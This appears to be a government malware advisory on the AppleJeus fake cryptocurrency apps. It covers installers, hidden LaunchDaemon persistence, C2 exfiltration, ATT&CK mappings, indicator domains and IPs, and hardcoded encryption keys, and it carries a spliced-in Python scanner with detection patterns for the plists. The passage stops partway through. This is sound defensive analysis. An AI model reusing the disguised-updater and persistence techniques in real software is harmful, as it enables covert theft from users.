Trade Pro application is an MSI Installer (`.msi`). The MSI Installer installation package comprises a software component and an application programming interface (API) that Microsoft uses for the installation, maintenance, and removal of software. 
The installer looks legitimate and is signed by a valid Sectigo certificate that was purchased by the same user as the SSL certificate for celasllc[.]com (_Obtain Capabilities: Code Signing Certificates_ [[T1588.003](<https://attack.mitre.org/versions/v8/techniques/T1588/003/>)]). The MSI Installer asks the victim for administrative privileges to run (_User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v8/techniques/T1204/002>)]).\n\nOnce permission is granted, the threat actor is able to run the program with elevated privileges (_Abuse Elevation Control Mechanism_ [[T1548](<https://attack.mitre.org/versions/v8/techniques/T1548/>)]) and MSI executes the following actions.\n\n * Installs `CelasTradePro.exe` in folder `C:\\Program Files (x86)\\CelasTradePro`\n * Installs `Updater.exe` in folder `C:\\Program Files (x86)\\CelasTradePro`\n * Runs `Updater.exe` with the `CheckUpdate` parameters\n\nThe `CelasTradePro.exe` program asks for the user\u2019s exchange and loads a legitimate-looking cryptocurrency trading platform\u2014very similar to the benign Q.T. Bitcoin Trader\u2014that exhibits no signs of malicious activity.\n\nThe `Updater.exe` program has the same program icon as `CelasTradePro.exe`. When run, it checks for the `CheckUpdate` parameter, collects the victim\u2019s host information (_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>)]), encrypts the collected information with a hardcoded XOR encryption, and sends information to a C2 website (_Exfiltration Over C2 Channe_l [[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]).\n\n#### **_macOS X Program_**\n\nThe macOS version of the malicious application is a DMG Installer that has a disk image format that Apple commonly uses to distribute software over the internet. 
The installer looks legitimate and has a valid digital signature from Sectigo (_Obtain Capabilities: Digital Certificates _[[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). It has very similar functionality to the Windows version. The installer executes the following actions.\n\n * Installs `CelasTradePro` in folder `/Applications/CelasTradePro.app/Contents/MacOS/`\n * Installs `Updater` in folder `/Applications/CelasTradePro.app/Contents/MacOS`\n * Executes a `postinstall` script \n * Moves `.com.celastradepro.plist` to folder `LaunchDaemons`\n * Runs `Updater` with the `CheckUpdate` parameter\n\n`CelasTradePro` asks for the user\u2019s exchange and loads a legitimate-looking cryptocurrency trading platform\u2014very similar to the benign Q.T. Bitcoin Trader\u2014that exhibits no signs of malicious activity.\n\n`Updater` checks for the `CheckUpdate` parameter and, when found, it collects the victim\u2019s host information (_System Owner/User Discovery _[[T1033]](<https://attack.mitre.org/versions/v8/techniques/T1033>)), encrypts the collected information with a hardcoded XOR key before exfiltration, and sends the encrypted information to a C2 website (_Exfiltration Over C2 Channel _[[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]). This process helps the adversary obtain persistence on a victim\u2019s network.\n\nThe `postinstall` script is a sequence of instructions that runs after successfully installing an application (_Command and Scripting Interpreter: Unix Shell_ [[T1059.004](<https://attack.mitre.org/versions/v8/techniques/T1059/004/>)]). This script moves property list (`plist`) file `.com.celastradepro.plist` from the installer package to the `LaunchDaemons` folder (_Scheduled Task/Job: Launchd_ [[T1053.004](<https://attack.mitre.org/versions/v8/techniques/T1053/004/>)]). 
The leading \u201c.\u201d makes it unlisted in the Finder app or default Terminal directory listing (_Hide Artifacts: Hidden Files and Directories_ [[T1564.001](<https://attack.mitre.org/versions/v8/techniques/T1564/001/>)]). Once in the folder, this property list (`plist`) file will launch the `Updater` program with the `CheckUpdate` parameter on system load as Root for every user. Because the `LaunchDaemon` will not run automatically after the `plist` file is moved, the `postinstall` script launches the `Updater` program with the `CheckUpdate` parameter and runs it in the background (Create or _Modify System Process: Launch Daemon _[[T1543.004](<https://attack.mitre.org/versions/v8/techniques/T1543/004/>)]).\n\n#### **_Payload_**\n\nAfter a cybersecurity company published a report detailing the above programs and their malicious extras, the website was no longer accessible. Since this site was the C2 server, the payload cannot be confirmed. The cybersecurity company that published the report states the payload was an encrypted and obfuscated binary (_Obfuscated Files or Information _[[T1027](<https://attack.mitre.org/versions/v8/techniques/T1027>)]), which eventually drops FALLCHILL onto the machine and installs it as a service (_Create or Modify System Process: Windows Service _[[T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003>)]). FALLCHILL malware uses an RC4 encryption algorithm with a 16-byte key to protect its communications (_Encrypted Channel: Symmetric Cryptography_ [[T1573.001](<https://attack.mitre.org/versions/v8/techniques/T1573/001>)]). 
The key employed in these versions has also been used in a previous version of FALLCHILL.[[5](<https://us-cert.cisa.gov/ncas/alerts/TA17-318A>)][[6](<https://attack.mitre.org/versions/v8/software/S0181/>)]\n\nFor more details on AppleJeus Version 1: Celas Trade Pro, see [MAR-10322463-1.v1](<https://us-cert.gov/ncas/analysis-reports/ar21-048a>).\n\n### **AppleJeus Version 2: JMT Trading**\n\n#### **Introduction and Infrastructure**\n\nIn October 2019, a cybersecurity company identified a new version of the AppleJeus malware\u2014JMT Trading\u2014thanks to its many similarities to the original AppleJeus malware. Again, the malware was in the form of a cryptocurrency trading application, which a legitimate-looking company, called JMT Trading, marketed and distributed on their website, `jmttrading[.]org` (_Acquire Infrastructure: Domain_ [[T1583.001](<https://attack.mitre.org/versions/v8/techniques/T1583/001/>)]). This website contained a \u201cDownload from GitHub\u201d button, which linked to JMT Trading\u2019s GitHub page (_Acquire Infrastructure: Web Services_ [[T1583.006](<https://attack.mitre.org/versions/v8/techniques/T1583/006>)]), where Windows and macOS X versions of the JMT Trader application were available for download (_Develop Capabilities: Malware_ [[T1587.001](<https://attack.mitre.org/versions/v8/techniques/T1587/001/>)]). 
The GitHub page also included .zip and tar.gz files containing the source code.\n\nThe `jmttrading[.]org` domain resolved to the following IP addresses from October 15, 2016, to January 22, 2021.\n\n * `45.33.2[.]79`\n * `45.33.23[.]183`\n * `45.56.79[.]23`\n * `45.79.19[.]196`\n * `96.126.123[.]244`\n * `146.112.61[.]107`\n * `184.168.221[.]40`\n * `184.168.221[.]57`\n * `198.187.29[.]20`\n * `198.54.117[.]197`\n * `198.54.117[.]198`\n * `198.54.117[.]199`\n * `198.54.117[.]200`\n * `198.58.118[.]167`\n\nThe `jmttrading[.]org` domain had a valid Sectigo SSL certificate (_Obtain Capabilities: Digital Certificates _[[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). The SSL certificate was \u201cDomain Control Validated,\u201d a weak security verification level that does not require validation of the owner\u2019s identity or the actual business\u2019s existence. The current SSL certificate was issued by Let\u2019s Encrypt.\n\n#### **JMT Trading Application Analysis**\n\n#### **_Windows Program_**\n\nThe Windows version of the malicious cryptocurrency application is an MSI Installer. The installer looks legitimate and has a valid digital signature from Sectigo (_Obtain Capabilities: Digital Certificates_ [[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). The signature was signed with a code signing certificate purchased by the same user as the SSL certificate for `jmttrading[.]org` (_Obtain Capabilities: Code Signing Certificates_ [[T1588.003](<https://attack.mitre.org/versions/v8/techniques/T1588/003/>)]). 
The MSI Installer asks the victim for administrative privileges to run (_User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v8/techniques/T1204/002>)]).\n\nOnce permission is granted, the MSI executes the following actions.\n\n * Installs `JMTTrader.exe` in folder `C:\\Program Files (x86)\\JMTTrader`\n * Installs `CrashReporter.exe` in folder `C:\\Users\\<username>\\AppData\\Roaming\\JMTTrader`\n * Runs `CrashReporter.exe` with the `Maintain` parameter\n\nThe `JMTTrader.exe` program asks for the user\u2019s exchange and loads a legitimate-looking cryptocurrency trading platform\u2014very similar to `CelasTradePro.exe` and the benign Q.T. Bitcoin Trader\u2014that exhibits no signs of malicious activity.\n\nThe program `CrashReporter.exe` is heavily obfuscated with the ADVObfuscation library, renamed \u201csnowman\u201d (_Obfuscated Files or Information_ [[T1027](<https://attack.mitre.org/versions/v8/techniques/T1027>)]). When run, it checks for the `Maintain` parameter and collects the victim\u2019s host information (_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>)]), encrypts the collected information with a hardcoded XOR key before exfiltration, and sends the encrypted information to a C2 website (_Exfiltration Over C2 Channel _[[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]). The program also creates a scheduled SYSTEM task, named `JMTCrashReporter`, which runs `CrashReporter.exe` with the `Maintain` parameter at any user\u2019s login (_Scheduled Task/Job: Scheduled Task_ [[T1053.005](<https://attack.mitre.org/versions/v8/techniques/T1053/005>)]).\n\n#### **_macOS X Program_**\n\nThe macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation. 
The installer executes the following actions.\n\n * Installs `JMTTrader` in folder `/Applications/JMTTrader.app/Contents/MacOS/`\n * Installs `.CrashReporter` in folder `/Applications/JMTTrader.app/Contents/Resources/`\n * Note: the leading \u201c.\u201d makes it unlisted in the Finder app or default Terminal directory listing.\n * Executes a `postinstall` script \n * Moves `.com.jmttrading.plist` to folder `LaunchDaemons`\n * Changes the file permissions on the `plist`\n * Runs `CrashReporter` with the `Maintain` parameter\n * Moves `.CrashReporter` to folder `/Library/JMTTrader/CrashReporter`\n * Makes `.CrashReporter` executable\n\nThe `JMTTrader` program asks for the user\u2019s exchange and loads a legitimate-looking cryptocurrency trading platform\u2014very similar to `CelasTradePro` and the benign Q.T. Bitcoin Trader\u2014that exhibits no signs of malicious activity.\n\nThe `CrashReporter` program checks for the `Maintain` parameter and is not obfuscated. This lack of obfuscation makes it easier to determine the program\u2019s functionality in detail. When it finds the `Maintain` parameter, it collects the victim\u2019s host information (_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>)]), encrypts the collected information with a hardcoded XOR key before exfiltration, and sends the encrypted information to a C2 website (_Exfiltration Over C2 Channel _[[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]).\n\nThe `postinstall` script has similar functionality to the one used by `CelasTradePro`, but it has a few additional features (_Command and Scripting Interpreter: Unix Shell_ [[T1059.004](<https://attack.mitre.org/versions/v8/techniques/T1059/004/>)]). 
It moves the property list (`plist`) file `.com.jmttrading.plis`t from the Installer package to the `LaunchDaemons` folder (_Scheduled Task/Job: Launchd _[[T1053.004](<https://attack.mitre.org/versions/v8/techniques/T1053/004/>)]), but also changes the file permissions on the `plist` file. Once in the folder, this property list (`plist`) file will launch the `CrashReporter` program with the `Maintain` parameter on system load as Root for every user. Also, the `postinstall` script moves the `.CrashReporter` program to a new location `/Library/JMTTrader/CrashReporter` and makes it executable. Because the `LaunchDaemon` will not run automatically after the `plist` file is moved, the `postinstall` script launches `CrashReporter` with the `Maintain` parameter and runs it in the background (_Create or Modify System Process: Launch Daemon_ [[T1543.004](<https://attack.mitre.org/versions/v8/techniques/T1543/004/>)]).\n\n#### **_Payload_**\n\nSoon after the cybersecurity company tweeted about JMT Trader on October 11, 2019, the files on GitHub were updated to clean, non-malicious installers. Then on October 13, 2019, a different cybersecurity company published an article detailing the macOS X JMT Trader, and soon after, the C2 `beastgoc[.]com` website went offline. There is not a confirmed sample of the payload to analyze at this point.\n\nFor more details on AppleJeus Version 2: JMT Trading, see [MAR-10322463-2.v1](<https://us-cert.gov/ncas/analysis-reports/ar21-048b>).\n\n### AppleJeus Version 3: Union Crypto\n\n#### **Introduction and Infrastructure**\n\nIn December 2019, another version of the AppleJeus malware was identified on Twitter by a cybersecurity company based on many similarities to the original AppleJeus malware. 
Again, the malware was in the form of a cryptocurrency trading application, which was marketed and distributed by a legitimate-looking company, called Union Crypto, on their website, `unioncrypto[.]vip` (_Acquire Infrastructure: Domain_ [[T1583.001](<https://attack.mitre.org/versions/v8/techniques/T1583/001/>)]). Although this website is no longer available, a cybersecurity researcher discovered a download link, `https://www.unioncrypto[.]vip/download/W6c2dq8By7luMhCmya2v97YeN`, recorded on VirusTotal for the macOS X version of `UnionCryptoTrader`. In contrast, open-source reporting stated that the Windows version might have been downloaded via instant messaging service Telegram, as it was found in a \u201cTelegram Downloads\u201d folder on an unnamed victim.[[7](<https://securelist.com/operation-applejeus-sequel/95596/>)]\n\nThe `unioncrypto[.]vip` domain resolved to the following IP addresses from June 5, 2019, to July 15, 2020.\n\n * `104.168.167[.]16`\n * `198.54.117[.]197`\n * `198.54.117[.]198`\n * `198.54.117[.]199`\n * `198.54.117[.]200`\n\nThe domain `unioncrypto[.]vip `had a valid Sectigo SSL certificate (_Obtain Capabilities: Digital Certificates_ [[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). 
The SSL certificate was \u201cDomain Control Validated,\u201d a weak security verification level that does not require validation of the owner\u2019s identity or the actual business\u2019s existence.\n\n#### **Union Crypto Trader Application Analysis**\n\n#### **_Windows Program_**\n\nThe Windows version of the malicious cryptocurrency application is a Windows executable (`.exe`) (_User Execution: Malicious File_ [[T1204.002](<https://attack.mitre.org/versions/v8/techniques/T1204/002>)]), which acts as an installer that extracts a temporary MSI Installer.\n\nThe Windows program executes the following actions.\n\n * Extracts `UnionCryptoTrader.msi` to folder `C:\\Users\\<username>\\AppData\\Local\\Temp\\{82E4B719-90F74BD1-9CF1-56CD777E0C42}`\n * Runs `UnionCryptoUpdater.msi`\n * Installs `UnionCryptoTrader.exe` in folder `C:\\Program Files\\UnionCryptoTrader`\n * Installs `UnionCryptoUpdater.exe in folder C:\\Users\\<username>\\AppData\\Local\\UnionCryptoTrader`\n * Deletes `UnionCryptoUpdater.msi`\n * Runs `UnionCryptoUpdater.exe`\n\nThe program `UnionCryptoTrader.exe` loads a legitimate-looking cryptocurrency arbitrage application\u2014defined as \u201cthe simultaneous buying and selling of securities, currency, or commodities in different markets or in derivative forms to take advantage of differing prices for the same asset\u201d\u2014which exhibits no signs of malicious activity. This application is very similar to another cryptocurrency arbitrage application known as Blackbird Bitcoin Arbitrage.[[8](<https://github.com/butor/blackbird>)]\n\nThe program `UnionCryptoUpdater.exe` first installs itself as a service (_Create or Modify System Process: Windows Service_ [[T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003>)]), which will automatically start when any user logs on (_Boot or Logon Autostart Execution_ [[T1547](<https://attack.mitre.org/versions/v8/techniques/T1547/>)]). 
The service is installed with a description stating it \u201cAutomatically installs updates for Union Crypto Trader.\u201d When launched, it collects the victim\u2019s host information (_System Owner/User Discovery _[[T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>)]), combines the information in a string that is MD5 hashed and stored in the `auth_signature` variable before exfiltration, and sends it to a C2 website (_Exfiltration Over C2 Channel _[[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]).\n\n#### **_macOS X Program_**\n\nThe macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation. The installer executes the following actions.\n\n * Installs `UnionCryptoTrader` in folder `/Applications/UnionCryptoTrader.app/Contents/MacOS/`\n * Installs `.unioncryptoupdater` in folder `/Applications/UnionCryptoTrader.app/Contents/Resources/`\n * Note: the leading \u201c.\u201d makes it unlisted in the Finder app or default Terminal directory listing\n * Executes a `postinstall` script \n * Moves `.vip.unioncrypto.plist` to folder `LaunchDaemons`\n * Changes the file permissions on the `plist` to Root\n * Runs `unioncryptoupdater`\n * Moves `.unioncryptoupdater` to folder `/Library/UnionCrypto/unioncryptoupdater`\n * Makes `.unioncryptoupdater` executable\n\nThe `UnionCryptoTrader` program loads a legitimate-looking cryptocurrency arbitrage application, which exhibits no signs of malicious activity. The application is very similar to another cryptocurrency arbitrage application known as Blackbird Bitcoin Arbitrage.\n\nThe `.unioncryptoupdater` program is signed ad-hoc, meaning it is not signed with a valid code-signing identity. 
When launched, it collects the victim\u2019s host information (_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>)]), combines the information in a string that is MD5 hashed and stored in the `auth_signature` variable before exfiltration, and sends it to a C2 website (_Exfiltration Over C2 Channel _[[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]).\n\nThe `postinstall` script has similar functionality to the one used by JMT Trading (_Command and Scripting Interpreter: Unix Shell_ [[T1059.004](<https://attack.mitre.org/versions/v8/techniques/T1059/004/>)]). It moves the property list (`plist`) file `.vip.unioncrypto.plist` from the Installer package to the `LaunchDaemons` folder (_Scheduled Task/Job: Launchd_ [[T1053.004](<https://attack.mitre.org/versions/v8/techniques/T1053/004/>)]), but also changes the file permissions on the `plist` file to Root. Once in the folder, this property list (`plist`) file will launch the `.unioncryptoupdater` on system load as Root for every user. The `postinstall` script moves the `.unioncryptoupdater` program to a new location `/Library/UnionCrypto/unioncryptoupdater` and makes it executable. Because the `LaunchDaemon` will not run automatically after the `plist` file is moved, the `postinstall` script launches `.unioncryptoupdater` and runs it in the background (_Create or Modify System_ _Process: Launch Daemon_ [[T1543.004](<https://attack.mitre.org/versions/v8/techniques/T1543/004/>)]).\n\n#### **_Payload_**\n\nThe payload for the Windows malware is a Windows Dynamic-Link-Library. `UnionCryptoUpdater.exe` does not immediately download the stage 2 malware but instead downloads it after a time specified by the C2 server. This delay could be implemented to prevent researchers from directly obtaining the stage 2 malware.\n\nThe macOS X malware\u2019s payload could not be downloaded, as the C2 server is no longer accessible. 
Additionally, none of the open-source reporting for this sample contained copies of the macOS X payload. The macOS X payload is likely similar in functionality to the Windows stage 2 detailed above.\n\nFor more details on AppleJeus Version 3: Union Crypto, see [MAR-10322463-3.v1](<https://us-cert.gov/ncas/analysis-reports/ar21-048c>).\n\n### Commonalities between Celas Trade Pro, JMT Trading, and Union Crypto\n\n#### **Hardcoded Values**\n\nIn each AppleJeus version, there are hardcoded values used for encryption or to create a signature when combined with the time (table 1).\n\n_Table 1: AppleJeus hardcoded values and uses_\n\n**AppleJeus Version ** | **Value ** | **Use ** \n---|---|--- \n1: Celas Trade Pro | Moz&Wie;#t/6T!2y | XOR encryption to send data \n1: Celas Trade Pro | W29ab@ad%Df324V$Yd | RC4 decryption \n2: JMT Trader Windows | X,%`PMk--Jj8s+6=15:20:11 | XOR encryption to send data \n2: JMT Trader OSX | X,%`PMk--Jj8s+6=\\x02 | XOR encryption to send data \n3: Union Crypto Trader | 12GWAPCT1F0I1S14 | Combined with time for signature \n \nThe Union Crypto Trader and Celas LLC (XOR) values are 16 bytes in length. For JMT Trader, the first 16 bytes of the Windows and macOS X values are identical, and the additional bytes are in a time format for the Windows sample. The structure of a 16-byte value combined with the time is also used in Union Crypto Trader to create the `auth_signature`.\n\nAs mentioned, FALLCHILL was reported as the final payload for Celas Trade Pro. All FALLCHILL samples use 16-byte hardcoded RC4 keys for sending data, similar to the 16-byte keys in the AppleJeus samples.\n\n#### **Open-Source Cryptocurrency Applications**\n\nAll three AppleJeus samples are bundled with modified copies of legitimate cryptocurrency applications and can be used as originally designed to trade cryptocurrency. Both Celas LLC and JMT Trader modified the same cryptocurrency application, Q.T. 
Bitcoin Trader; Union Crypto Trader modified the Blackbird Bitcoin Arbitrage application.\n\n#### **Postinstall Scripts, Property List Files, and LaunchDaemons**\n\nThe macOS X samples of all three AppleJeus versions contain `postinstall` scripts with similar logic. The Celas LLC `postinstall` script only moves the `plist` file to a new location and launches `Updater` with the `CheckUpdate` parameter in the background. The JMT Trader and Union Crypto Trader also perform these actions and have identical functionality. The additional actions performed by both `postinstall` scripts are to change the file permissions on the `plist`, make a new directory in the `/Library` folder, move `CrashReporter` or `UnionCryptoUpdater` to the newly created folder, and make them executable.\n\nThe `plist` files for all three AppleJeus files have identical functionality. They only differ in the files\u2019 names and one default comment that was not removed from the Celas LLC `plist`. As the logic and functionality of the postinstall scripts and plist files are almost identical, the `LaunchDaemons` created also function the same.\n\nThey will all launch the secondary executable as Root on system load for every user.\n\n### AppleJeus Version 4: Kupay Wallet\n\n#### **Introduction and Infrastructure**\n\nOn March 13, 2020, a new version of the AppleJeus malware was identified. The malware was marketed and distributed by a legitimate-looking company, called Kupay Wallet, on their website `kupaywallet[.]com` (_Acquire Infrastructure: Domain_ [[T1583.001](<https://attack.mitre.org/versions/v8/techniques/T1583/001/>)]).\n\nThe domain `www.kupaywallet[.]com` resolved to IP address `104.200.67[.]96` from March 20, 2020, to January 16, 2021. 
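A persistence review for the launchd pattern the macOS samples above share (a `plist` dropped into `LaunchDaemons`, often with a hidden name, that runs a secondary "updater" as Root on system load), added here as an example and not part of the advisory. The plist bodies it scans are constructed for the demo from the file, path and parameter names the advisory gives; they are not the real AppleJeus plists.

```python
import os
import plistlib
import tempfile
from dataclasses import dataclass, field

# LaunchDaemon plist names the advisory reports for the macOS AppleJeus samples (versions 1-5).
KNOWN_APPLEJEUS_PLISTS = {
    ".com.celastradepro.plist", ".com.jmttrading.plist", ".vip.unioncrypto.plist",
    "com.kupay.pkg.wallet.plist", "com.coingotrade.pkg.product.plist",
}
SUSPICIOUS_ARGS = {"CheckUpdate", "Maintain"}  # updater switches named in the advisory


@dataclass
class Finding:
    path: str
    strong: list = field(default_factory=list)  # traits specific to the AppleJeus pattern
    weak: list = field(default_factory=list)    # traits many legitimate daemons share


def review_plist(path: str) -> Finding:
    """Inspect one LaunchDaemon plist for the traits the advisory describes."""
    finding = Finding(path)
    name = os.path.basename(path)
    # Hidden plist name (leading '.'), as in versions 1-3 (T1564.001).
    if name.startswith("."):
        finding.strong.append("hidden plist file name (leading '.')")
    if name in KNOWN_APPLEJEUS_PLISTS:
        finding.strong.append("file name matches an AppleJeus plist named in the advisory")
    try:
        with open(path, "rb") as fh:
            plist = plistlib.load(fh)
    except Exception as exc:  # an unreadable daemon plist is itself worth a look
        finding.weak.append(f"could not parse plist: {exc}")
        return finding
    args = list(plist.get("ProgramArguments") or [])
    program = plist.get("Program") or (args[0] if args else "")
    if plist.get("RunAtLoad") and program:
        # The postinstall scripts move the updater out of the .app bundle into
        # /Library/<vendor>/ or /Library/Application Support/<vendor>/ and run it as root.
        if program.startswith("/Library/"):
            finding.weak.append(f"RunAtLoad executable under /Library: {program}")
        # Hidden executable name, as with .CrashReporter and .unioncryptoupdater.
        if os.path.basename(program).startswith("."):
            finding.strong.append(f"hidden executable name: {program}")
    hits = SUSPICIOUS_ARGS.intersection(args[1:])
    if hits:
        finding.strong.append(f"updater switch on the command line: {sorted(hits)}")
    return finding


def scan_launchdaemons(directory: str) -> list:
    """Review every .plist in directory and return those with at least one strong trait."""
    results = []
    for name in sorted(os.listdir(directory)):
        if name.endswith(".plist"):
            finding = review_plist(os.path.join(directory, name))
            if finding.strong:
                results.append(finding)
    return results


def write_demo_launchdaemons(directory: str) -> None:
    """Write constructed sample plists (NOT the real AppleJeus files) into directory."""
    samples = {
        # Modeled on the JMT Trading daemon: CrashReporter run with the Maintain switch.
        ".com.jmttrading.plist": {
            "Label": "com.jmttrading",
            "ProgramArguments": ["/Library/JMTTrader/CrashReporter", "Maintain"],
            "RunAtLoad": True,
        },
        # Modeled on the Union Crypto daemon: hidden plist name, no switch.
        ".vip.unioncrypto.plist": {
            "Label": "vip.unioncrypto",
            "ProgramArguments": ["/Library/UnionCrypto/unioncryptoupdater"],
            "RunAtLoad": True,
        },
        # A benign daemon with the same RunAtLoad shape, which must not be flagged.
        "com.example.backup.plist": {
            "Label": "com.example.backup",
            "ProgramArguments": ["/usr/local/bin/backup-agent", "--daemon"],
            "RunAtLoad": True,
        },
    }
    for name, body in samples.items():
        with open(os.path.join(directory, name), "wb") as fh:
            plistlib.dump(body, fh)


def demo() -> dict:
    """Scan a temporary directory of the constructed samples; map plist name -> strong traits."""
    with tempfile.TemporaryDirectory() as tmp:
        write_demo_launchdaemons(tmp)
        return {os.path.basename(f.path): f.strong for f in scan_launchdaemons(tmp)}


if __name__ == "__main__":
    for plist_name, traits in demo().items():
        print(plist_name, "->", "; ".join(traits))
```

On a live host call `scan_launchdaemons("/Library/LaunchDaemons")` instead of `demo()`; the `/Library` trait is kept as weak context only, because many legitimate daemons also run from there.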
CrownCloud US, LLC controlled the IP address (autonomous system number [ASN] 8100), and is located in New York, NY.\n\nThe domain `www.kupaywallet[.]com` had a valid Sectigo SSL certificate (_Obtain Capabilities: Digital Certificates_ [[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). The SSL certificate was \u201cDomain Control Validated,\u201d a weak security verification level that does not require validation of the owner\u2019s identity or the actual business\u2019s existence.\n\n#### **Kupay Wallet Application Analysis**\n\n#### _Windows Program_\n\nThe Windows version of the malicious cryptocurrency application is an MSI Installer. The MSI executes the following actions.\n\n * Installs `Kupay.exe` in folder `C:\\Program Files (x86)\\Kupay`\n * Installs `KupayUpgrade.exe` in folder `C:\\Users\\<username>\\AppData\\Roaming\\KupaySupport`\n * Runs `KupayUpgrade.exe`\n\nThe program `Kupay.exe` loads a legitimate-looking cryptocurrency wallet platform, which exhibits no signs of malicious activity and is very similar to an open-source platform known as Copay, distributed by Atlanta-based company BitPay.\n\nThe program `KupayUpgrade.exe` first installs itself as a service (_Create or Modify System Process:_ _Windows Service_ [[T1543.003](<https://attack.mitre.org/versions/v8/techniques/T1543/003>)]), which will automatically start when any user logs on (_Boot or Logon_ _Autostart Execution_ [[T1547](<https://attack.mitre.org/versions/v8/techniques/T1547/>)]). 
The service is installed with a description stating it is an \u201cAutomatic Kupay Upgrade.\u201d When launched, it collects the victim\u2019s host information (_System Owner/User Discovery_ [[T1033](<https://attack.mitre.org/versions/v8/techniques/T1033>)]), combines the information in strings before exfiltration, and sends it to a C2 website (_Exfiltration Over C2_ _Channel_ [[T1041](<https://attack.mitre.org/versions/v8/techniques/T1041>)]).\n\n#### **_macOS X Program_**\n\nThe macOS version of the malicious application is a DMG Installer. The installer looks legitimate and has very similar functionality to the Windows version, but it does not have a digital certificate and will warn the user of that before installation. The installer executes the following actions.\n\n * Installs `Kupay` in folder `/Applications/Kupay.app/Contents/MacOS/`\n * Installs `kupay_upgrade` in folder `/Applications/Kupay.app/Contents/MacOS/`\n * Executes a `postinstall` script \n * Creates `KupayDaemon` folder in `/Library/Application Support` folder\n * Moves `kupay_upgrade` to the new folder\n * Moves `com.kupay.pkg.wallet.plist` to folder `/Library/LaunchDaemons/`\n * Runs the command `launchctl load` to load the `plist` without a restart\n * Runs `kupay_upgrade` in the background\n\n`Kupay` is likely a copy of an open-source cryptocurrency wallet application, loads a legitimate-looking wallet program (fully functional), and its functionality is identical to the Windows `Kupay.exe` program.\n\nThe `kupay_upgrade` program calls its function `CheckUpdate` (which contains most of the logic functionality of the malware) and sends a `POST` to the C2 server with a connection named \u201cKupay Wallet 9.0.1 (Check Update Osx)\u201d (_Application Layer Protocol: Web Protocols_ [[T1071.001](<https://attack.mitre.org/versions/v8/techniques/T1071/001>)]). 
If the C2 server returns a file, it is decoded and written to the victim\u2019s folder `/private/tmp/kupay_update` with permissions set by the command `chmod 700` (only the user can read, write, and execute) (_Command and Scripting Interpreter_ [[T1059](<https://attack.mitre.org/versions/v8/techniques/T1059/>)]). Stage 2 is then launched, and the malware, `kupay_upgrade`, returns to sleeping and checking in with the C2 server at predetermined intervals (_Application Layer Protocol: Web Protocols_ [[T1071.001](<https://attack.mitre.org/versions/v8/techniques/T1071/001>)]).\n\nThe `postinstall` script has similar functionality to other AppleJeus scripts (_Command and Scripting Interpreter: Unix Shell_ [[T1059.004](<https://attack.mitre.org/versions/v8/techniques/T1059/004/>)]). It creates the `KupayDaemon` folder in `/Library/Application` Support folder and then moves `kupay_upgrade` to the new folder. It moves the property list (`plist`) file `com.kupay.pkg.wallet.plist` from the Installer package to the `/Library/LaunchDaemons/` folder (_Scheduled Task/Job: Launchd _[[T1053.004](<https://attack.mitre.org/versions/v8/techniques/T1053/004/>)]). The script runs the command `launchctl load` to load the `plist` without a restart (_Command and Scripting Interpreter _[[T1059](<https://attack.mitre.org/versions/v8/techniques/T1059/>)]). But, since the LaunchDaemon will not run automatically after the `plist` file is moved, the `postinstall` script launches `kupay_upgrade` and runs it in the background (_Create or Modify System Process: Launch Daemon _[[T1543.004](<https://attack.mitre.org/versions/v8/techniques/T1543/004/>)]).\n\n#### **_Payload_**\n\nThe Windows malware\u2019s payload could not be downloaded since the C2 server is no longer accessible. Additionally, none of the open-source reporting for this sample contained copies of the payload. 
The Windows payload is likely similar in functionality to the macOS X stage 2 detailed below.\n\nThe stage 2 payload for the macOS X malware was decoded and analyzed. The stage 2 malware has a variety of functionalities. Most importantly, it checks in with a C2 and, after connecting to the C2, can send or receive a payload, read and write files, execute commands via the terminal, etc.\n\nFor more details on AppleJeus Version 4: Kupay Wallet, see [MAR-10322463-4.v1](<https://us-cert.gov/ncas/analysis-reports/ar21-048d>).\n\n### AppleJeus Version 5: CoinGoTrade\n\n#### **Introduction and Infrastructure**\n\nIn early 2020, another version of the AppleJeus malware was identified. This time the malware was marketed and distributed by a legitimate-looking company called CoinGoTrade on their website `coingotrade[.]com` (_Acquire Infrastructure: Domain_ [[T1583.001](<https://attack.mitre.org/versions/v8/techniques/T1583/001/>)]).\n\nThe domain `CoinGoTrade[.]com` resolved to IP address `198.54.114[.]175` from February 28, 2020, to January 23, 2021. The IP address is controlled by NameCheap Inc. (ASN 22612) and is located in Atlanta, GA. This IP address is in the same ASN for `Dorusio[.]com` and `Ants2Whale[.]com`.\n\nThe domain `CoinGoTrade[.]com` had a valid Sectigo SSL certificate (_Obtain Capabilities: Digital Certificates_ [[T1588.004](<https://attack.mitre.org/versions/v8/techniques/T1588/004/>)]). The SSL certificate was \u201cDomain Control Validated,\u201d a weak security verification level that does not require validation of the owner\u2019s identity or the actual business\u2019s existence.\n\n#### **CoinGoTrade Application Analysis**\n\n#### **_Windows Program_**\n\nThe Windows version of the malicious application is an MSI Installer. 
